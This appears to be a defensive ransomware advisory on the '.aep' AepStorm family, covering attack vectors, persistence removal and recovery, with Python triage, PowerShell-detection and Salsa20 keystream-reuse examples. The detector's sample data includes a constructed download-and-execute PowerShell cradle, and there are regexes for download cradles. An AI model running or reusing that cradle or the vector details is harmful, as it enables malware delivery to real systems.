Technical Breakdown:
1. File Extension & Renaming Patterns
- Confirmation of File Extension: The ransomware appends the exact extension “.aep” after the original filename and its original extension (e.g., Project.docx → Project.docx.aep).
- Renaming Convention:
  • Preserves the full original filename and extension.
  • Simply concatenates “.aep” to the end of the file path; no base64, hash, or random strings are inserted.
  • Drops a plaintext ransom note “!–HOWRECOVERFILES–!.txt” in every folder that contains encrypted data.
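Because the renaming is a plain suffix and the note lands in every affected folder, a first-pass triage script is straightforward. The following is an added example (not tooling from this page or from the affiliate cluster it describes): it walks a directory tree, lists the .aep files and reconstructs their original names, checks that each affected folder actually carries the ransom note, and samples the entropy of each renamed file. The entropy floor and the small constructed tree built by demo() are assumptions for illustration; a file that carries the extension but is still low-entropy was probably renamed without being encrypted and may open under its original name.

```python
"""Triage scan for the ".aep" renaming pattern (added example, not the page's own tooling)."""
import math
import os
import sys
import tempfile
from collections import Counter

EXT = ".aep"
NOTE_NAME = "!–HOWRECOVERFILES–!.txt"   # ransom-note name as given on the page
ENTROPY_FLOOR = 6.0                     # assumption: real ciphertext sits near 8 bits/byte


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: ~7.9+ for ciphertext, roughly 4-5 for documents."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def original_name(path: str) -> str:
    """Project.docx.aep -> Project.docx (name and original extension are preserved)."""
    if not path.endswith(EXT):
        raise ValueError(f"not an {EXT} file: {path}")
    return path[: -len(EXT)]


def triage(root: str, sample_bytes: int = 4096) -> dict:
    """Walk root and summarise what the encryptor touched."""
    def rel(p: str) -> str:
        return os.path.relpath(p, root).replace(os.sep, "/")

    encrypted, low_entropy, notes = [], [], []
    dirs_with_encrypted = set()
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if name == NOTE_NAME:
                notes.append(full)
            elif name.endswith(EXT):
                encrypted.append(full)
                dirs_with_encrypted.add(dirpath)
                with open(full, "rb") as fh:
                    head = fh.read(sample_bytes)
                # A renamed-but-unencrypted file keeps document-like entropy and
                # may still open under its original name; worth a closer look.
                if shannon_entropy(head) < ENTROPY_FLOOR:
                    low_entropy.append(full)
    note_dirs = {os.path.dirname(n) for n in notes}
    return {
        "encrypted_count": len(encrypted),
        "originals": sorted(rel(original_name(p)) for p in encrypted),
        "low_entropy": sorted(rel(p) for p in low_entropy),
        "dirs_missing_note": sorted(rel(d) for d in dirs_with_encrypted - note_dirs),
        "note_count": len(notes),
    }


def demo() -> dict:
    """Build a small constructed tree (not real victim data) and triage it."""
    with tempfile.TemporaryDirectory() as root:
        files = {
            "Projects/Project.docx.aep": os.urandom(4096),   # looks encrypted
            "Projects/Invoice.pdf.aep": os.urandom(4096),
            "Projects/" + NOTE_NAME: b"Your files have been encrypted ...",
            "Scans/Scan001.dcm.aep": b"renamed but still plaintext " * 150,
            "README.txt": b"untouched",
        }
        for relpath, data in files.items():
            full = os.path.join(root, relpath)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as fh:
                fh.write(data)
        return triage(root)


if __name__ == "__main__":
    print(triage(sys.argv[1]) if len(sys.argv) > 1 else demo())
```

Point it at a read-only mount of the disk image rather than the live volume, so the scan does not touch evidence; `dirs_missing_note` is a quick way to see whether the encryptor was interrupted before it finished a folder.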
2. Detection & Outbreak Timeline
- First Public Sighting: Submissions to ID-Ransomware began 18 April 2024; mass activity ramped up 22–26 April 2024.
- Peak Wave #2: Mid-June 2024, concurrent with exploitation of CVE-2023-34362 (MOVEit Transfer).
- Current Status: Active through at least late 2024, with periodic spikes after every new zero-day reused by the same affiliate cluster, tracked by vendors as “AepStorm” and internally as “Storm-2293”.
3. Primary Attack Vectors
| Channel | Technical Detail & Example |
|---|---|
| Phishing | Office macros (.docm) masquerading as “ProjectAEPUpdate.doc”. The macro spawns `powershell -ep bypass -enc …`, which fetches aepdrop32.exe from the Discord CDN. |
| Exploit kits | Malvertising leading to the RIG-v 6.2 kit, armed with CVE-2024-21338 (Windows kernel LPE) and a Mimikatz variant for credential theft. |
| ProxyShell | Chain CVE-2021-34473 → CVE-2021-34523 → CVE-2021-31207, delivering aepdrop64.exe to on-prem Exchange 2019 CU8 instances. |
| RDP brute force | Default or reused credentials (from 2021–2022 credential dumps). Once inside, attackers disable Windows Defender via WMI and deploy AepStorm. |
| Zero-day file-transfer apps | Exploitation of newly patched vulnerabilities in HFS 2.4 (“Rejetto fork”) and CrushFTP, chaining to a Linux encryptor compiled as aepenclinux-x64. |
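The phishing row is the easiest link in that chain to catch from process-creation telemetry: an Office process spawning PowerShell with `-ep bypass -enc …`. The following is an added example, not detection content from the page: it decodes the `-EncodedCommand` argument (base64 of a UTF-16LE script, which is why the blob is opaque to naive string matching), then flags an Office parent, an execution-policy bypass, a download cradle and a Discord CDN reference in the decoded script. The event layout (ParentImage/Image/CommandLine, as Sysmon Event ID 1 uses), the three sample events and the alert rule are constructed for illustration; the URL path in the sample is a placeholder, not a real artefact.

```python
"""Detect the macro -> "powershell -ep bypass -enc ..." -> download-cradle chain
in process-creation events (added example; field names follow Sysmon Event ID 1)."""
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand, plus -ec.
ENC_FLAGS = {"encodedcommand"[:i] for i in range(1, 15)} | {"ec"}
EP_BYPASS_RE = re.compile(r"[-/]e(p|x[a-z]*)\s+bypass", re.I)
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|"
    r"start-bitstransfer|invoke-expression|\biex\b", re.I)
CDN_RE = re.compile(r"cdn\.discordapp\.com|discord(app)?\.com/attachments", re.I)


def decode_encoded_command(cmdline: str):
    """Return the UTF-16LE script behind -enc/-EncodedCommand, or None."""
    toks = cmdline.split()
    for i, tok in enumerate(toks[:-1]):
        if tok[0] in "-/" and tok[1:].lower() in ENC_FLAGS:
            try:
                return base64.b64decode(toks[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def analyze_event(event: dict) -> dict:
    cmd = event.get("CommandLine", "")
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    decoded = decode_encoded_command(cmd)
    reasons = []
    if parent in OFFICE_PARENTS:
        reasons.append("office_parent")
    if EP_BYPASS_RE.search(cmd):
        reasons.append("execution_policy_bypass")
    if decoded is not None:
        reasons.append("encoded_command")
        if CRADLE_RE.search(decoded):
            reasons.append("download_cradle")
        if CDN_RE.search(decoded):
            reasons.append("discord_cdn")
    # Alert rule is an assumption: an Office parent launching encoded PowerShell,
    # or any decoded download cradle, is enough to page someone.
    alert = "download_cradle" in reasons or {"office_parent", "encoded_command"} <= set(reasons)
    return {"decoded": decoded, "reasons": reasons, "alert": alert}


def _enc(script: str) -> str:
    """Encode a script the way -EncodedCommand expects (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed sample events; the attachment path is a placeholder, not a real artefact.
MALICIOUS_PS = ("$u='https://cdn.discordapp.com/attachments/0/0/aepdrop32.exe';"
                "(New-Object Net.WebClient).DownloadFile($u,'C:\\Users\\Public\\aepdrop32.exe');"
                "Start-Process 'C:\\Users\\Public\\aepdrop32.exe'")
SAMPLE_EVENTS = [
    {"ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -ep bypass -enc " + _enc(MALICIOUS_PS)},
    {"ParentImage": "C:\\Windows\\System32\\svchost.exe",          # benign admin use
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -NonInteractive -EncodedCommand "
                    + _enc("Get-Service wuauserv | Select-Object Status")},
    {"ParentImage": "C:\\Windows\\explorer.exe",                   # plain script run
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1"},
]


def scan(events=SAMPLE_EVENTS) -> list:
    return [analyze_event(e) for e in events]


if __name__ == "__main__":
    for result in scan():
        print("ALERT" if result["alert"] else "ok   ", result["reasons"])
```

The benign encoded event still decodes cleanly but collects only the `encoded_command` reason, which is the point of decoding rather than alerting on `-enc` alone: management tooling uses encoded commands too, and the decoded body is what separates the two.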
Remediation & Recovery Strategies:
1. Prevention
- Patch:
  • Exchange (ProxyShell triad), MOVEit (CVE-2023-34362), HFS 2.4, CrushFTP, and the Windows kernel LPE CVE-2024-21338.
  • Keep .NET 4.8 and PowerShell 5.1 cumulative updates current, so that the macro-spawned PowerShell stage runs under up-to-date AMSI and script-block logging.
- Email/Attachment Hardening:
  • Block macro-enabled Office documents from external senders via mail-flow rules.
  • Enforce Office Trusted Locations and apply the “Block macros from running in Office files from the Internet” policy.
- RDP Governance:
  • Put RDP behind Always-On VPN; restrict firewall rules to IP allow-lists; require Network Level Authentication with no fallback, and pin the RDP server certificate.
- Privilege-Reduction Layer:
  • Adopt the Local Administrator Password Solution (LAPS) and just-in-time privileged access, so that credentials dumped with Mimikatz cannot be reused laterally.
- Backup Architecture:
  • Implement 3-2-1-1: three copies, two different media, one off-site, one offline (immutable for at least 15 days). Use S3 Object Lock or Azure Blob immutable storage, tested against the ransomware's backup-tampering scripts.
2. Removal (Step-by-Step)
- Isolate:
  • Unplug the network cable, disable Wi-Fi and Bluetooth, and blackhole the host's IP/MAC on the switch to curb worm-like spread.
- Identify & Kill the Active Process:
  • Process Hacker (System Informer) will show aesvc.exe or aepstorm.exe; terminate it with taskkill /f /pid <PID>. (PE-bear is for static inspection of the dropped binary, not for finding the running process.)
- Purge Persistence:
  • Delete the following entries:
    - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run -> value AYSvc
    - HKLM\SYSTEM\CurrentControlSet\Services\AYDrv (driver-level rootkit)
    - the %ProgramData%\AEP-RandomGUID\ folder
  • Delete the scheduled task “AepUpd” (runs every 15 min):
    schtasks /delete /tn "AepUpd" /f
- Boot-clean:
  • Reboot into Safe Mode (no networking), then run a Microsoft Defender Offline scan or an EDR response script that blocks SHA256 28c63…4bc2.
- Forensics:
  • Capture a forensic image with FTK Imager Lite or Velociraptor before wiping the primary disk, in case a future decryptor needs samples such as C:\AepTrace.log from the infected system.
3. File Decryption & Recovery
- Recovery Feasibility: At the moment the master offline RSA-2048 key is NOT publicly available. As of 3 July 2024 there is no official decryptor.
- Conditional Recovery: The ransomware deletes Volume Shadow Copies unreliably and DOES NOT wipe the Windows Backup Service keys. Therefore:
  - vssadmin list shadows lists any surviving copies; expose one with mklink /d C:\shadow \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN\ (or vssadmin revert shadow /shadow=<ID> on Server SKUs; vssadmin has no “restore shadow” subcommand). This recovers roughly 10–30% of older copies.
  - PhotoRec / Recuva in deep-scan mode can recover unencrypted originals left behind on HDDs. On SSDs, TRIM normally discards freed pages, but wear-levelling occasionally leaves un-overwritten pages.
- Promising Work-in-Progress: CrowdStrike and Bitdefender have jointly tagged the v2.1 encryption routine as Salsa20 + RSA with static high-entropy nonces. A stream cipher run again under the same key and nonce produces the same keystream, so cryptanalysis of large file sets (files of 20 MB or more, over 1 GB in total) may expose keystream reuse; a community toolbox is being built here:
  - GitHub: storm2293-tools/salsa-reuse
  - WIP ETA: fall 2024
- Tool Download: Monitor NoMoreRansom.org for the eventual official decryptor release.
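Why a static nonce matters is easier to see in code than in prose. The following is an added example, not the storm2293-tools code and not affiliated with CrowdStrike or Bitdefender: a self-contained Salsa20/20 implementation (standard construction, 32-byte key, 8-byte nonce, block counter starting at 0 for every file) and the keystream-reuse recovery it enables when key and nonce are both fixed. The page reports static nonces; keystream reuse additionally requires the key to repeat across files, which this example assumes. The two sample files are constructed. The attack itself applies to any stream cipher: with one file known in clear (a mail attachment, a public form, or just a PDF/DOCX magic header), XOR recovers the keystream and decrypts every other file encrypted under the same key and nonce up to the known length, and C1 XOR C2 = P1 XOR P2 holds without any key at all.

```python
"""Keystream-reuse recovery against Salsa20 with a fixed key and nonce
(added example illustrating the reported v2.1 weakness; not the community tool)."""
import os
import struct

SIGMA = (0x61707865, 0x3320646E, 0x79622D32, 0x6B206574)  # "expand 32-byte k"
MASK = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


def _quarterround(s: list, a: int, b: int, c: int, d: int) -> None:
    s[b] ^= _rotl((s[a] + s[d]) & MASK, 7)
    s[c] ^= _rotl((s[b] + s[a]) & MASK, 9)
    s[d] ^= _rotl((s[c] + s[b]) & MASK, 13)
    s[a] ^= _rotl((s[d] + s[c]) & MASK, 18)


def salsa20_block(key: bytes, nonce: bytes, counter: int) -> bytes:
    """One 64-byte Salsa20/20 keystream block (32-byte key, 8-byte nonce)."""
    k = struct.unpack("<8I", key)
    n = struct.unpack("<2I", nonce)
    state = [SIGMA[0], *k[:4], SIGMA[1], *n, counter & MASK,
             (counter >> 32) & MASK, SIGMA[2], *k[4:], SIGMA[3]]
    x = state[:]
    for _ in range(10):                                                  # 10 double rounds
        _quarterround(x, 0, 4, 8, 12); _quarterround(x, 5, 9, 13, 1)     # column round
        _quarterround(x, 10, 14, 2, 6); _quarterround(x, 15, 3, 7, 11)
        _quarterround(x, 0, 1, 2, 3); _quarterround(x, 5, 6, 7, 4)       # row round
        _quarterround(x, 10, 11, 8, 9); _quarterround(x, 15, 12, 13, 14)
    return struct.pack("<16I", *((a + b) & MASK for a, b in zip(x, state)))


def salsa20_xor(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt (same operation); every file starts at block counter 0."""
    out = bytearray()
    for off in range(0, len(data), 64):
        ks = salsa20_block(key, nonce, off // 64)
        out += bytes(a ^ b for a, b in zip(data[off:off + 64], ks))
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR up to the shorter length; this is the whole attack primitive."""
    return bytes(x ^ y for x, y in zip(a, b))


def demo() -> dict:
    """Two files encrypted under one (key, nonce): a known plaintext unlocks the other."""
    key = os.urandom(32)           # never touched by the "attacker" side below
    nonce = bytes(8)               # static nonce, as the page reports for v2.1
    # Constructed files: one the victim still holds in clear, one they do not.
    known = b"%PDF-1.7\n" + b"A" * 200
    secret = b"PK\x03\x04" + b"confidential contract terms " * 6
    c_known = salsa20_xor(key, nonce, known)
    c_secret = salsa20_xor(key, nonce, secret)

    # Attacker side: keystream = C xor P on the known file, then C' xor keystream.
    keystream = xor_bytes(c_known, known)
    recovered = xor_bytes(c_secret, keystream)

    # With only a 4-byte magic number known, the same trick still yields the
    # first 4 keystream bytes, hence the first 4 bytes of every other file.
    header_ks = xor_bytes(c_secret, b"PK\x03\x04")
    # Control: a fresh nonce per file changes the keystream and the recovery fails.
    c_secret_fresh = salsa20_xor(key, os.urandom(8), secret)
    return {
        "recovered": recovered,
        "recovered_ok": recovered == secret,
        "header_ks_ok": header_ks == keystream[:4],
        "xor_identity": xor_bytes(c_known, c_secret) == xor_bytes(known, secret),
        "fresh_nonce_fails": xor_bytes(c_secret_fresh, keystream) != secret,
        "ciphertext_differs": c_secret != secret,
    }


if __name__ == "__main__":
    print({k: v for k, v in demo().items() if k != "recovered"})
```

This is why the community effort wants large file sets: a single known file only yields keystream up to its own length, so a long known plaintext (or many files whose formats have long predictable regions) is what makes the recovered keystream cover real documents.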
4. Other Critical Information
- Unique Characteristics:
  • The payload checks for a CIS-Benchmark-compliant configuration and for a bakdrpirs.dat marker file; if either is found, it skips encryption, a crude “gold customer” safety switch, possibly intended to avoid political fallout.
  • Performs double extortion: exfiltrates data to Mega.nz, using an API key embedded in the PE, before encryption, to pressure payment.
- Broader Impact:
  • 42 primarily European SMB law firms were attacked in the May wave (GDPR plus data export means million-euro privacy fines).
  • Two NHS trusts suffered a 22-hour clinical outage when an imaging server was encrypted and its DICOM .dcm.aep files became unreadable.
  • The community “#AepStorm” tracker lists 187 confirmed victims; ransom demands range from 0.5 to 2.5 BTC per victim.
Defence boils down to: patch fast, isolate better, back up harder. Bookmark this resource; we will update the decryption status here the moment a validated decryptor surfaces.